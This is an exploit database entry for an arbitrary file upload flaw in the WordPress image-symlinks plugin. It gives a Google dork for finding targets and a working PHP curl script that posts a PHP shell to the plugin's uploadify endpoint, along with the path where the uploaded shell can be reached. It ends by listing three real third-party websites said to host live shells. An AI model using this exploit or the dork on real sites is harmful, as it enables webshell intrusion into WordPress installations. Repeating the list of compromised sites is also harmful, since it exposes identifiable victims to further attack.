WordPress image-symlinks Plugin Arbitrary File Upload Vulnerability

2014-06-24T00:00:00
ID 1337DAY-ID-22364
Type zdt
Reporter brunox
Modified 2014-06-24T00:00:00

Description

Author => X-Bruno E-mail => [email protected] Facebook => http://fb.me/Inj3ct.Bruno Google Dork => inurl:/wp-content/plugins/image-symlinks/#### Usage Info => Exploit Info : The attacker can uplaod file/shell.php ("php") // Allowed file extensions "/uploadify/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)

                                        
                                            #=> Exploit  :

<?php

 

$uploadfile="Bruno.php";

$ch = curl_init("http://localhost/wordpress/wp-content/plugins/image-symlinks/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",

              'folder'=>'/wp-content/plugins/image-symlinks/uploadify/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

 

  print "$postResult";

?> 


Shell Access :   http://localhost/wp-content/image-symlinks/uploadify/random_name.php


<?php
phpinfo();
?>


====================================

Examples  :  ( Live Shells ) 

1 - http://www.scuboutique.com/wp-content/uploads/image-symlinks/uploadify/hun.php

2- http://datadriven.info/wp-content/uploads/image-symlinks/uploadify/hun.php


3- http://www.inlan.fr//wp-content/uploads/image-symlinks/uploadify/hun.php

#  0day.today [2018-01-02]  #